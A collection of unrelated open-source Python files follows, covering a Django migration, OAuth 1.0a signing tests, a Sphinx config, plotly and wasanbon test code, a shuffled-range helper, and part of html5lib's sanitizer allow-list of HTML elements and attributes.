to the tutorial or translations')], max_length=15)), ('experience', models.TextField()), ('venue', models.TextField()), ('sponsorship', models.TextField()), ('coaches', models.TextField()), ('previous_event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='core.Event')), ('status', models.CharField(choices=[('new', 'New'), ('in_review', 'In review'), ('on_hold', 'On hold'), ('accepted', 'Accepted'), ('rejected', 'Rejected')], default='new', max_length=10)), ('status_changed_at', models.DateTimeField(blank=True, null=True)), ('comment', models.TextField(blank=True, null=True)), ], options={ 'permissions': (('can_accept_organize_application', 'Can accept Organize Applications'),), }, ), migrations.AddField( model_name='coorganizer', name='event_application', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='coorganizers', to='organize.EventApplication'), ), ]
patjouk/djangogirls
organize/migrations/0001_squashed_0004_remove_eventapplication_rejection_reason.py
Python
bsd-3-clause
3,612
import urlparse from oauth10a import signing_requests from tests import test_oauth10a class TestCase(test_oauth10a.TestCase): def test_trivial(self): self.assertTrue(signing_requests) def test_request_url(self): url = 'HTTP://Example.com:80/resource?id=123' request_url = signing_requests.request_url(url) self.assertEqual(request_url, 'http://example.com/resource') def test_normalized_request_parameters(self): normalized = signing_requests.normalized_request_parameters( oauth_params=dict(a=1, c='hi%20there', f=25, z='p'), get_params=dict(f=50, z='t'), post_params=dict(f='a')) self.assertEqual(normalized, 'a=1&c=hi%20there&f=25&f=50&f=a&z=p&z=t') def test_normalized_request_parameters_excludes_oauth_signature(self): normalized = signing_requests.normalized_request_parameters( oauth_params=dict( oauth_consumer_key='dpf43f3p2l4k3l03', oauth_token='nnch734d00sl2jdk', oauth_signature_method='HMAC-SHA1', oauth_signature='pending', oauth_timestamp='1191242096', oauth_nonce='kllo9940pd9333jh', oauth_version='1.0'), get_params=dict( file='vacation.jpg', size='original'), post_params=dict()) self.assertEqual( normalized, 'file=vacation.jpg&oauth_consumer_key=dpf43f3p2l4k3l03&oauth_nonce' '=kllo9940pd9333jh&oauth_signature_method=HMAC-SHA1&oauth_timestam' 'p=1191242096&oauth_token=nnch734d00sl2jdk&oauth_version=1.0&size=' 'original') def test_signature_base_string(self): s = signing_requests.signature_base_string( http_method='GET', url='http://photos.example.net/photos', oauth_params=dict( oauth_consumer_key='dpf43f3p2l4k3l03', oauth_token='nnch734d00sl2jdk', oauth_signature_method='HMAC-SHA1', oauth_timestamp='1191242096', oauth_nonce='kllo9940pd9333jh', oauth_version='1.0'), get_params=dict( file='vacation.jpg', size='original'), post_params=dict()) self.assertEqual( s, 'GET&http%3A%2F%2Fphotos.example.net%2Fphotos&file%3Dvacation.jpg%' '26oauth_consumer_key%3Ddpf43f3p2l4k3l03%26oauth_nonce%3Dkllo9940p' 'd9333jh%26oauth_signature_method%3DHMAC-SHA1%26oauth_timestamp%3D' '1191242096%26oauth_token%3Dnnch734d00sl2jdk%26oauth_version%3D1.0' '%26size%3Doriginal') class LinkedInTestCase(test_oauth10a.TestCase): def setUp(self): # http://developer.linkedin.com/oauth-test-console self.consumer_key = 'efubm7z8ww6k40m9l5czq25l0' self.consumer_secret = '1ln2puav04fl6s22oy0l98x69' self.member_token = 'akk4fj6h5967zc0ra6hzmsd62' self.member_secret = 'amppgl8vnr7hgaqqzi0igoq4f' self.http_verb = 'GET' self.url = 'http://example.com/8szrt134wyc0e8kdqwxj3bmf' self.query_params = '5268cf=4rbjsn&a7xbsd=7h0qfi' self.nonce = 'mjylxo54rrqad1fjxjhf67cc' self.timestamp = 1375241716 self.expected_signature_base_string = ( 'GET&http%3A%2F%2Fexample.com%2F8szrt134wyc0e8kdqwxj3bmf&5268cf%3D' '4rbjsn%26a7xbsd%3D7h0qfi%26oauth_consumer_key%3Defubm7z8ww6k40m9l' '5czq25l0%26oauth_nonce%3Dmjylxo54rrqad1fjxjhf67cc%26oauth_signatu' 're_method%3DHMAC-SHA1%26oauth_timestamp%3D1375241716%26oauth_toke' 'n%3Dakk4fj6h5967zc0ra6hzmsd62%26oauth_version%3D1.0') self.expected_signature = 'Ilt9SqALMiI9fwmgrNv+JzICEF4=' self.expected_http_authentication_header = ( 'OAuth oauth_nonce="mjylxo54rrqad1fjxjhf67cc" oauth_timestamp="137' '5241716" oauth_version="1.0" oauth_signature_method="HMAC-SHA1" o' 'auth_consumer_key="efubm7z8ww6k40m9l5czq25l0" oauth_token="akk4fj' '6h5967zc0ra6hzmsd62" oauth_signature="Ilt9SqALMiI9fwmgrNv%2BJzICE' 'F4%3D"') self.expected_url = 'http://example.com/8szrt134wyc0e8kdqwxj3bmf' def test_request_url(self): url = self.url request_url = signing_requests.request_url(url) self.assertEqual(request_url, self.expected_url) def test_signature_base_string(self): s = signing_requests.signature_base_string( http_method=self.http_verb, url=self.url, oauth_params=dict( oauth_consumer_key=self.consumer_key, oauth_token=self.member_token, oauth_signature_method='HMAC-SHA1', oauth_timestamp=str(self.timestamp), oauth_nonce=self.nonce, oauth_version='1.0'), get_params=dict(urlparse.parse_qsl(self.query_params))) self.assertEqual(s, self.expected_signature_base_string)
dolph/python-oauth10a
tests/test_signing_requests.py
Python
apache-2.0
5,074
import sys, os from sphinx.highlighting import lexers from pygments.lexers.web import PhpLexer lexers['php'] = PhpLexer(startinline=True, linenos=1) lexers['php-annotations'] = PhpLexer(startinline=True, linenos=1) primary_domain = 'php' extensions = [] templates_path = ['_templates'] source_suffix = '.rst' master_doc = 'index' project = u'Wunderlist PHP SDK' copyright = u'2015, Ítalo Lelis de Vietro' version = '4.0.0' html_title = "Wunderlist PHP SDK Documentation" html_short_title = "Wunderlist PHP SDK" exclude_patterns = ['_build'] html_static_path = ['_static'] on_rtd = os.environ.get('READTHEDOCS', None) == 'True' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
italolelis/wunderlist
docs/conf.py
Python
mit
839
class User(object): def __init__(self, username=None, password=None, email=None): self.username = username self.password = password self.email = email @classmethod def admin(cls): return cls(username="admin", password="admin") #random values for username and password @classmethod def random_data(cls): from random import randint return cls(username="user" + str(randint(0, 1000)), password="pass" + str(randint(0, 1000)))
ArtemVavilov88/php4dvd_tests
php4dvd/model/user.py
Python
apache-2.0
512
from vcms.simpleblogs.tests.test_page_build import * from vcms.simpleblogs.tests.test_blog_page_controller import *
francisl/vcms
modules/vcms/simpleblogs/tests/__init__.py
Python
bsd-3-clause
116
#!/usr/bin/env python from .util import create_url, get_or_else, parse_date class ScheduleAPI: """Access to Schedule API This class is inherited by :class:`tdclient.api.API`. """ def create_schedule(self, name, params=None): """Create a new scheduled query with the specified name. Args: name (str): Scheduled query name. params (dict, optional): Extra parameters. - type (str): Query type. {"presto", "hive"}. Default: "hive" - database (str): Target database name. - timezone (str): Scheduled query's timezone. e.g. "UTC" For details, see also: https://gist.github.com/frsyuki/4533752 - cron (str, optional): Schedule of the query. {``"@daily"``, ``"@hourly"``, ``"10 * * * *"`` (custom cron)} See also: https://tddocs.atlassian.net/wiki/spaces/PD/pages/1084633/Scheduling+Jobs+Using+TD+Console - delay (int, optional): A delay ensures all buffered events are imported before running the query. Default: 0 - query (str): Is a language used to retrieve, insert, update and modify data. See also: https://tddocs.atlassian.net/wiki/spaces/PD/pages/1084438/SQL+Examples+of+Scheduled+Queries - priority (int, optional): Priority of the query. Range is from -2 (very low) to 2 (very high). Default: 0 - retry_limit (int, optional): Automatic retry count. Default: 0 - engine_version (str, optional): Engine version to be used. If none is specified, the account's default engine version would be set. {"stable", "experimental"} - pool_name (str, optional): For Presto only. Pool name to be used, if not specified, default pool would be used. - result (str, optional): Location where to store the result of the query. e.g. 'tableau://user:[email protected]:1234/datasource' Returns: datetime.datetime: Start date time. """ params = {} if params is None else params params.update({"type": params.get("type", "hive")}) with self.post( create_url("/v3/schedule/create/{name}", name=name), params ) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Create schedule failed", res, body) js = self.checked_json(body, ["start"]) return parse_date(get_or_else(js, "start", "1970-01-01T00:00:00Z")) def delete_schedule(self, name): """Delete the scheduled query with the specified name. Args: name (str): Target scheduled query name. Returns: (str, str): Tuple of cron and query. """ with self.post(create_url("/v3/schedule/delete/{name}", name=name)) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Delete schedule failed", res, body) js = self.checked_json(body, ["cron", "query"]) return js["cron"], js["query"] def list_schedules(self): """Get the list of all the scheduled queries. Returns: [(name:str, cron:str, query:str, database:str, result_url:str)] """ with self.get("/v3/schedule/list") as res: code, body = res.status, res.read() if code != 200: self.raise_error("List schedules failed", res, body) js = self.checked_json(body, ["schedules"]) return [schedule_to_tuple(m) for m in js["schedules"]] def update_schedule(self, name, params=None): """Update the scheduled query. Args: name (str): Target scheduled query name. params (dict): Extra parameters. - type (str): Query type. {"presto", "hive"}. Default: "hive" - database (str): Target database name. - timezone (str): Scheduled query's timezone. e.g. "UTC" For details, see also: https://gist.github.com/frsyuki/4533752 - cron (str, optional): Schedule of the query. {``"@daily"``, ``"@hourly"``, ``"10 * * * *"`` (custom cron)} See also: https://tddocs.atlassian.net/wiki/spaces/PD/pages/1084633/Scheduling+Jobs+Using+TD+Console - delay (int, optional): A delay ensures all buffered events are imported before running the query. Default: 0 - query (str): Is a language used to retrieve, insert, update and modify data. See also: https://tddocs.atlassian.net/wiki/spaces/PD/pages/1084438/SQL+Examples+of+Scheduled+Queries - priority (int, optional): Priority of the query. Range is from -2 (very low) to 2 (very high). Default: 0 - retry_limit (int, optional): Automatic retry count. Default: 0 - engine_version (str, optional): Engine version to be used. If none is specified, the account's default engine version would be set. {"stable", "experimental"} - pool_name (str, optional): For Presto only. Pool name to be used, if not specified, default pool would be used. - result (str, optional): Location where to store the result of the query. e.g. 'tableau://user:[email protected]:1234/datasource' """ params = {} if params is None else params with self.post( create_url("/v3/schedule/update/{name}", name=name), params ) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Update schedule failed", res, body) def history(self, name, _from=0, to=None): """Get the history details of the saved query for the past 90days. Args: name (str): Target name of the scheduled query. _from (int, optional): Indicates from which nth record in the run history would be fetched. Default: 0. Note: Count starts from zero. This means that the first record in the list has a count of zero. to (int, optional): Indicates up to which nth record in the run history would be fetched. Default: 20 Returns: dict: History of the scheduled query. """ params = {} if _from is not None: params["from"] = str(_from) if to is not None: params["to"] = str(to) with self.get( create_url("/v3/schedule/history/{name}", name=name), params ) as res: code, body = res.status, res.read() if code != 200: self.raise_error("List history failed", res, body) js = self.checked_json(body, ["history"]) return [history_to_tuple(m) for m in js["history"]] def run_schedule(self, name, time, num=None): """Execute the specified query. Args: name (str): Target scheduled query name. time (int): Time in Unix epoch format that would be set as TD_SCHEDULED_TIME num (int, optional): Indicates how many times the query will be executed. Value should be 9 or less. Default: 1 Returns: list of tuple: [(job_id:int, type:str, scheduled_at:str)] """ params = {} if num is not None: params = {"num": num} with self.post( create_url("/v3/schedule/run/{name}/{time}", name=name, time=time), params ) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Run schedule failed", res, body) js = self.checked_json(body, ["jobs"]) return [job_to_tuple(m) for m in js["jobs"]] def job_to_tuple(m): job_id = m.get("job_id") scheduled_at = parse_date(get_or_else(m, "scheduled_at", "1970-01-01T00:00:00Z")) t = m.get("type", "?") return job_id, t, scheduled_at def schedule_to_tuple(m): m = dict(m) if "timezone" not in m: m["timezone"] = "UTC" m["created_at"] = parse_date(get_or_else(m, "created_at", "1970-01-01T00:00:00Z")) m["next_time"] = parse_date(get_or_else(m, "next_time", "1970-01-01T00:00:00Z")) return m def history_to_tuple(m): job_id = m.get("job_id") t = m.get("type", "?") database = m.get("database") status = m.get("status") query = m.get("query") start_at = parse_date(get_or_else(m, "start_at", "1970-01-01T00:00:00Z")) end_at = parse_date(get_or_else(m, "end_at", "1970-01-01T00:00:00Z")) scheduled_at = parse_date(get_or_else(m, "scheduled_at", "1970-01-01T00:00:00Z")) result_url = m.get("result") priority = m.get("priority") return ( scheduled_at, job_id, t, status, query, start_at, end_at, result_url, priority, database, )
treasure-data/td-client-python
tdclient/schedule_api.py
Python
apache-2.0
9,750
# test for wasanbon/core/plugins/admin/environment_plugin/setup/path.py import unittest from unittest import mock from unittest.mock import Mock, call import os from wasanbon.core.plugins.admin.environment_plugin.setup import path class TestPlugin(unittest.TestCase): @mock.patch('sys.stdout.write') def test_search_command_linux_import_python(self, sys_stdout_write): """test for search_command (import python module)""" test_module = 'test_hoge' test_module_path = 'test_hoge_path' test_cmd = 'python_test_hoge' test_path = 'test_path' test_hints = ['h1', 'h2'] # mock to import by __import__ mock_modules = Mock(spec=['__path__']) mock_modules.__path__ = [test_module_path] import sys sys.modules[test_module] = mock_modules # test ret = path.search_command( test_cmd, test_path, test_hints, verbose=True) sys_out_calls = [ call('## Searching Command (%s)\n' % test_cmd), call('### Hint: %s\n' % test_hints[0]), call('### Hint: %s\n' % test_hints[1]), ] sys_stdout_write.assert_has_calls(sys_out_calls) self.assertEqual(ret, test_module_path) @mock.patch('sys.stdout.write') def test_search_command_linux_failed_to_import_python(self, sys_stdout_write): """test for search_command (failed to import python module)""" test_cmd = 'python_test_hoge' test_path = 'test_path' test_hints = ['h1', 'h2'] ret = path.search_command( test_cmd, test_path, test_hints, verbose=True) sys_out_calls = [ call('## Searching Command (%s)\n' % test_cmd), call('### Hint: %s\n' % test_hints[0]), call('### Hint: %s\n' % test_hints[1]), ] sys_stdout_write.assert_has_calls(sys_out_calls) self.assertEqual(ret, '') @mock.patch('sys.stdout.write') @mock.patch('os.path.isfile') def test_search_command_cmd_file_found(self, mock_isfile, sys_stdout_write): """test for search_command (not python, path endswith cmd)""" test_cmd = 'test_cmd' test_path = 'test_path_test_cmd' test_hints = ['h1', 'h2'] mock_isfile.return_value = True # test ret = path.search_command( test_cmd, test_path, test_hints, verbose=True) sys_out_calls = [ call('## Searching Command (%s)\n' % test_cmd), call('### Hint: %s\n' % test_hints[0]), call('### Hint: %s\n' % test_hints[1]), call('## Searching %s ... ' % (test_cmd)), call(' Found in %s\n' % test_path) ] sys_stdout_write.assert_has_calls(sys_out_calls) self.assertEqual(ret, test_path) @mock.patch('sys.stdout.write') @mock.patch('os.path.isfile') @mock.patch('os.environ', new={'PATH': ''}) def test_search_command_linux_cmd_not_in_path_notfoud(self, mock_isfile, sys_stdout_write): """test for search_command (not python, cmd file not found, darwin & linux)""" test_cmd = 'test_cmd' test_path = 'test_path_te,st_cmd' test_hints = ['h1', 'h2'] mock_isfile.return_value = False # test ret = path.search_command( test_cmd, test_path, test_hints, verbose=True) sys_out_calls = [ call('## Searching Command (%s)\n' % test_cmd), call('### Hint: %s\n' % test_hints[0]), call('### Hint: %s\n' % test_hints[1]), call('## Searching %s ... ' % (test_cmd)), call(' Not found.\n') ] sys_stdout_write.assert_has_calls(sys_out_calls) self.assertEqual(ret, '') @mock.patch('sys.platform', new='linux') @mock.patch('sys.stdout.write') @mock.patch('os.path.isfile') @mock.patch('os.environ', new={'PATH': 'hoge:fuga'}) def test_search_command_linux_cmd_not_in_path_foud(self, mock_isfile, sys_stdout_write): """test for search_command (not python, darwin & linux)""" test_cmd = 'test_cmd' test_path = 'test_path_te,st_cmd' test_hints = ['h1', 'h2'] mock_isfile.return_value = True # test ret = path.search_command( test_cmd, test_path, test_hints, verbose=True) sys_out_calls = [ call('## Searching Command (%s)\n' % test_cmd), call('### Hint: %s\n' % test_hints[0]), call('### Hint: %s\n' % test_hints[1]), call('## Searching %s ... ' % (test_cmd)), call(' Found in %s. \n' % os.path.join('hoge', test_cmd)) ] sys_stdout_write.assert_has_calls(sys_out_calls) self.assertEqual(ret, os.path.join('hoge', test_cmd)) @mock.patch('sys.platform', new='darwin') @mock.patch('sys.stdout.write') def test_search_command_darwin_cmd_is_java(self, sys_stdout_write): """test for search_command (cmd = java, darwin)""" test_cmd = 'java' test_path = 'test_path_te,st_cmd' test_hints = ['h1', 'h2'] test_mock_return = 'test fugafuga' # test with mock.patch.object(path, 'check_java_path_in_darwin', return_value=test_mock_return): ret = path.search_command( test_cmd, test_path, test_hints, verbose=True) sys_out_calls = [ call('## Searching Command (%s)\n' % test_cmd), call('### Hint: %s\n' % test_hints[0]), call('### Hint: %s\n' % test_hints[1]), ] sys_stdout_write.assert_has_calls(sys_out_calls) self.assertEqual(ret, test_mock_return) @mock.patch('sys.platform', new='unknown') @mock.patch('sys.stdout.write') def test_search_command_unknown_platform(self, sys_stdout_write): """test for search_command (unknown platform)""" test_cmd = 'java' test_path = 'test_path_te,st_cmd' test_hints = ['h1', 'h2'] # test ret = path.search_command( test_cmd, test_path, test_hints, verbose=True) sys_out_calls = [ call('## Searching Command (%s)\n' % test_cmd), call('### Hint: %s\n' % test_hints[0]), call('### Hint: %s\n' % test_hints[1]), ] sys_stdout_write.assert_has_calls(sys_out_calls) self.assertEqual(ret, '') @mock.patch('sys.stdout.write') @mock.patch('subprocess.Popen') def test_check_java_path_in_darwin_not_fount(self, mock_subprocess, sys_stdout_write): """test for check_java_path_in_darwin (java not found)""" test_cmd = 'test cmd' from subprocess import PIPE mock_p = Mock() mock_p.communicate.return_value = ('', ' No Java runtime present') mock_subprocess.return_value = mock_p # test ret = path.check_java_path_in_darwin(test_cmd, verbose=True) sys_out_calls = [ call('## Searching %s ... ' % (test_cmd)), call(' No Java runtime present\n') ] subprocess_calls = [ call([test_cmd, '-version'], stdout=PIPE, stderr=PIPE), ] mock_p_calls = [ call.wait(), call.communicate() ] sys_stdout_write.assert_has_calls(sys_out_calls) mock_subprocess.assert_has_calls(subprocess_calls) self.assertEqual(ret, '') mock_p.assert_has_calls(mock_p_calls) @mock.patch('sys.stdout.write') @mock.patch('subprocess.Popen') def test_check_java_path_in_darwin_found(self, mock_subprocess, sys_stdout_write): """test for check_java_path_in_darwin (java found)""" test_cmd = 'test cmd' from subprocess import PIPE mock_p = Mock() mock_p.communicate.return_value = ('', ' Java runtime present') mock_subprocess.return_value = mock_p # test ret = path.check_java_path_in_darwin(test_cmd, verbose=True) sys_out_calls = [ call('## Searching %s ... ' % (test_cmd)), call(' Java runtime found.\n') ] subprocess_calls = [ call([test_cmd, '-version'], stdout=PIPE, stderr=PIPE), ] mock_p_calls = [ call.wait(), call.communicate() ] sys_stdout_write.assert_has_calls(sys_out_calls) mock_subprocess.assert_has_calls(subprocess_calls) self.assertEqual(ret, "/usr/bin/" + test_cmd) mock_p.assert_has_calls(mock_p_calls) if __name__ == '__main__': unittest.main()
sugarsweetrobotics/wasanbon
test/test_admin_environment_plugin/test_setup/test_path.py
Python
gpl-3.0
8,743
# Copyright 2020 by Kurt Rathjen. All Rights Reserved. # # This library is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. This library is distributed in the # hope that it will be useful, but WITHOUT ANY WARRANTY; without even the # implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Lesser General Public License for more details. # You should have received a copy of the GNU Lesser General Public # License along with this library. If not, see <http://www.gnu.org/licenses/>. """ # Example: # RUN TEST SUITE import mutils.tests reload(mutils.tests) mutils.tests.run() """ import unittest import logging logging.basicConfig( filemode='w', level=logging.DEBUG, format='%(levelname)s: %(funcName)s: %(message)s', ) def testSuite(): """ Return a test suite containing all the tests. :rtype: unittest.TestSuite """ import test_pose import test_anim import test_match import test_utils import test_attribute import test_mirrortable suite = unittest.TestSuite() s = unittest.makeSuite(test_pose.TestPose, 'test') suite.addTest(s) s = unittest.makeSuite(test_anim.TestAnim, 'test') suite.addTest(s) s = unittest.makeSuite(test_utils.TestUtils, 'test') suite.addTest(s) s = unittest.makeSuite(test_match.TestMatch, 'test') suite.addTest(s) s = unittest.makeSuite(test_attribute.TestAttribute, 'test') suite.addTest(s) s = unittest.makeSuite(test_mirrortable.TestMirrorTable, 'test') suite.addTest(s) return suite def run(): """ Call from within Maya to run all valid tests. """ import mutils.animation mutils.animation.FIX_SAVE_ANIM_REFERENCE_LOCKED_ERROR = True tests = unittest.TextTestRunner() tests.run(testSuite())
krathjen/studiolibrary
src/mutils/tests/run.py
Python
lgpl-3.0
1,998
#!/usr/bin/python import itertools import random #import sys class ShufXRange(object): def __init__(self, *args): if len(args) == 1: self.min = 0 self.max = args[0] else: self.min = args[0] self.max = args[1] self.int_tuple = tuple(range(self.min, self.max)) self.shuffle() self.row_cycle = iter(self) def __len__(self): return len(self.int_tuple) def __getitem__(self, index): return self.int_tuple[index] # def __list__(self): # return self.int_list def __iter__(self): return itertools.cycle(list(self.int_tuple)) #return self.int_list #def __iter__(self): # return iter(self.int_list) # #def __next__(self): # return next(self.row_cycle) # #def next(self): # #int_list = list(self.int_tuple) # if not int_list: # raise StopIteration # return int_list.pop(0) # #def __next__(self): # for n in iter(self): # yield n # #def __iter__(self): # for n in iter(self.int_list): # yield n def __str__(self): result = '' for i in self.int_tuple: result += str(i) if i <= len(self): result += ' ' return result #def __next__(self): # while True: # yield next(iter(int_list)) # except StopIteration: def shuffle(self): last_index = self.max - 1 int_list = list(self.int_tuple) for i in range(last_index): last_index = last_index - i j = random.randint(0, i + 1) int_list[i], int_list[j] = int_list[j], int_list[i] self.int_tuple = tuple(int_list) return self class ShufRange(object): def __init__(self, min, max): self.shuf_obj = ShufXRange(min, max) self.iterer = iter(self.shuf_obj) def __str__(self): return str(self.shuf_obj) def __iter__(self): return self.iterer
hammerhorn/hammerhorn-jive
igo/cjh/shuf_range.py
Python
gpl-2.0
2,051
import _plotly_utils.basevalidators class ColorsrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__( self, plotly_name="colorsrc", parent_name="histogram.hoverlabel.font", **kwargs ): super(ColorsrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs )
plotly/python-api
packages/python/plotly/plotly/validators/histogram/hoverlabel/font/_colorsrc.py
Python
mit
473
from __future__ import absolute_import, division, unicode_literals import re from xml.sax.saxutils import escape, unescape from pip._vendor.six.moves import urllib_parse as urlparse from . import base from ..constants import namespaces, prefixes __all__ = ["Filter"] allowed_elements = frozenset(( (namespaces['html'], 'a'), (namespaces['html'], 'abbr'), (namespaces['html'], 'acronym'), (namespaces['html'], 'address'), (namespaces['html'], 'area'), (namespaces['html'], 'article'), (namespaces['html'], 'aside'), (namespaces['html'], 'audio'), (namespaces['html'], 'b'), (namespaces['html'], 'big'), (namespaces['html'], 'blockquote'), (namespaces['html'], 'br'), (namespaces['html'], 'button'), (namespaces['html'], 'canvasJs'), (namespaces['html'], 'caption'), (namespaces['html'], 'center'), (namespaces['html'], 'cite'), (namespaces['html'], 'code'), (namespaces['html'], 'col'), (namespaces['html'], 'colgroup'), (namespaces['html'], 'command'), (namespaces['html'], 'datagrid'), (namespaces['html'], 'datalist'), (namespaces['html'], 'dd'), (namespaces['html'], 'del'), (namespaces['html'], 'details'), (namespaces['html'], 'dfn'), (namespaces['html'], 'dialog'), (namespaces['html'], 'dir'), (namespaces['html'], 'div'), (namespaces['html'], 'dl'), (namespaces['html'], 'dt'), (namespaces['html'], 'em'), (namespaces['html'], 'event-source'), (namespaces['html'], 'fieldset'), (namespaces['html'], 'figcaption'), (namespaces['html'], 'figure'), (namespaces['html'], 'footer'), (namespaces['html'], 'font'), (namespaces['html'], 'form'), (namespaces['html'], 'header'), (namespaces['html'], 'h1'), (namespaces['html'], 'h2'), (namespaces['html'], 'h3'), (namespaces['html'], 'h4'), (namespaces['html'], 'h5'), (namespaces['html'], 'h6'), (namespaces['html'], 'hr'), (namespaces['html'], 'i'), (namespaces['html'], 'img'), (namespaces['html'], 'input'), (namespaces['html'], 'ins'), (namespaces['html'], 'keygen'), (namespaces['html'], 'kbd'), (namespaces['html'], 'label'), (namespaces['html'], 'legend'), (namespaces['html'], 'li'), (namespaces['html'], 'm'), (namespaces['html'], 'map'), (namespaces['html'], 'menu'), (namespaces['html'], 'meter'), (namespaces['html'], 'multicol'), (namespaces['html'], 'nav'), (namespaces['html'], 'nextid'), (namespaces['html'], 'ol'), (namespaces['html'], 'output'), (namespaces['html'], 'optgroup'), (namespaces['html'], 'option'), (namespaces['html'], 'p'), (namespaces['html'], 'pre'), (namespaces['html'], 'progress'), (namespaces['html'], 'q'), (namespaces['html'], 's'), (namespaces['html'], 'samp'), (namespaces['html'], 'section'), (namespaces['html'], 'select'), (namespaces['html'], 'small'), (namespaces['html'], 'sound'), (namespaces['html'], 'source'), (namespaces['html'], 'spacer'), (namespaces['html'], 'span'), (namespaces['html'], 'strike'), (namespaces['html'], 'strong'), (namespaces['html'], 'sub'), (namespaces['html'], 'sup'), (namespaces['html'], 'table'), (namespaces['html'], 'tbody'), (namespaces['html'], 'td'), (namespaces['html'], 'textarea'), (namespaces['html'], 'time'), (namespaces['html'], 'tfoot'), (namespaces['html'], 'th'), (namespaces['html'], 'thead'), (namespaces['html'], 'tr'), (namespaces['html'], 'tt'), (namespaces['html'], 'u'), (namespaces['html'], 'ul'), (namespaces['html'], 'var'), (namespaces['html'], 'video'), (namespaces['mathml'], 'maction'), (namespaces['mathml'], 'math'), (namespaces['mathml'], 'merror'), (namespaces['mathml'], 'mfrac'), (namespaces['mathml'], 'mi'), (namespaces['mathml'], 'mmultiscripts'), (namespaces['mathml'], 'mn'), (namespaces['mathml'], 'mo'), (namespaces['mathml'], 'mover'), (namespaces['mathml'], 'mpadded'), (namespaces['mathml'], 'mphantom'), (namespaces['mathml'], 'mprescripts'), (namespaces['mathml'], 'mroot'), (namespaces['mathml'], 'mrow'), (namespaces['mathml'], 'mspace'), (namespaces['mathml'], 'msqrt'), (namespaces['mathml'], 'mstyle'), (namespaces['mathml'], 'msub'), (namespaces['mathml'], 'msubsup'), (namespaces['mathml'], 'msup'), (namespaces['mathml'], 'mtable'), (namespaces['mathml'], 'mtd'), (namespaces['mathml'], 'mtext'), (namespaces['mathml'], 'mtr'), (namespaces['mathml'], 'munder'), (namespaces['mathml'], 'munderover'), (namespaces['mathml'], 'none'), (namespaces['svg'], 'a'), (namespaces['svg'], 'animate'), (namespaces['svg'], 'animateColor'), (namespaces['svg'], 'animateMotion'), (namespaces['svg'], 'animateTransform'), (namespaces['svg'], 'clipPath'), (namespaces['svg'], 'circle'), (namespaces['svg'], 'defs'), (namespaces['svg'], 'desc'), (namespaces['svg'], 'ellipse'), (namespaces['svg'], 'font-face'), (namespaces['svg'], 'font-face-name'), (namespaces['svg'], 'font-face-src'), (namespaces['svg'], 'g'), (namespaces['svg'], 'glyph'), (namespaces['svg'], 'hkern'), (namespaces['svg'], 'linearGradient'), (namespaces['svg'], 'line'), (namespaces['svg'], 'marker'), (namespaces['svg'], 'metadata'), (namespaces['svg'], 'missing-glyph'), (namespaces['svg'], 'mpath'), (namespaces['svg'], 'path'), (namespaces['svg'], 'polygon'), (namespaces['svg'], 'polyline'), (namespaces['svg'], 'radialGradient'), (namespaces['svg'], 'rect'), (namespaces['svg'], 'set'), (namespaces['svg'], 'stop'), (namespaces['svg'], 'svg'), (namespaces['svg'], 'switch'), (namespaces['svg'], 'text'), (namespaces['svg'], 'title'), (namespaces['svg'], 'tspan'), (namespaces['svg'], 'use'), )) allowed_attributes = frozenset(( # HTML attributes (None, 'abbr'), (None, 'accept'), (None, 'accept-charset'), (None, 'accesskey'), (None, 'action'), (None, 'align'), (None, 'alt'), (None, 'autocomplete'), (None, 'autofocus'), (None, 'axis'), (None, 'background'), (None, 'balance'), (None, 'bgcolor'), (None, 'bgproperties'), (None, 'border'), (None, 'bordercolor'), (None, 'bordercolordark'), (None, 'bordercolorlight'), (None, 'bottompadding'), (None, 'cellpadding'), (None, 'cellspacing'), (None, 'ch'), (None, 'challenge'), (None, 'char'), (None, 'charoff'), (None, 'choff'), (None, 'charset'), (None, 'checked'), (None, 'cite'), (None, 'class'), (None, 'clear'), (None, 'color'), (None, 'cols'), (None, 'colspan'), (None, 'compact'), (None, 'contenteditable'), (None, 'controls'), (None, 'coords'), (None, 'data'), (None, 'datafld'), (None, 'datapagesize'), (None, 'datasrc'), (None, 'datetime'), (None, 'default'), (None, 'delay'), (None, 'dir'), (None, 'disabled'), (None, 'draggable'), (None, 'dynsrc'), (None, 'enctype'), (None, 'end'), (None, 'face'), (None, 'for'), (None, 'form'), (None, 'frame'), (None, 'galleryimg'), (None, 'gutter'), (None, 'headers'), (None, 'height'), (None, 'hidefocus'), (None, 'hidden'), (None, 'high'), (None, 'href'), (None, 'hreflang'), (None, 'hspace'), (None, 'icon'), (None, 'id'), (None, 'inputmode'), (None, 'ismap'), (None, 'keytype'), (None, 'label'), (None, 'leftspacing'), (None, 'lang'), (None, 'list'), (None, 'longdesc'), (None, 'loop'), (None, 'loopcount'), (None, 'loopend'), (None, 'loopstart'), (None, 'low'), (None, 'lowsrc'), (None, 'max'), (None, 'maxlength'), (None, 'media'), (None, 'method'), (None, 'min'), (None, 'multiple'), (None, 'name'), (None, 'nohref'), (None, 'noshade'), (None, 'nowrap'), (None, 'open'), (None, 'optimum'), (None, 'pattern'), (None, 'ping'), (None, 'point-size'), (None, 'poster'), (None, 'pqg'), (None, 'preload'), (None, 'prompt'), (None, 'radiogroup'), (None, 'readonly'), (None, 'rel'), (None, 'repeat-max'), (None, 'repeat-min'), (None, 'replace'), (None, 'required'), (None, 'rev'), (None, 'rightspacing'), (None, 'rows'), (None, 'rowspan'), (None, 'rules'), (None, 'scope'), (None, 'selected'), (None, 'shape'), (None, 'size'), (None, 'span'), (None, 'src'), (None, 'start'), (None, 'step'), (None, 'style'), (None, 'summary'), (None, 'suppress'), (None, 'tabindex'), (None, 'target'), (None, 'template'), (None, 'title'), (None, 'toppadding'), (None, 'type'), (None, 'unselectable'), (None, 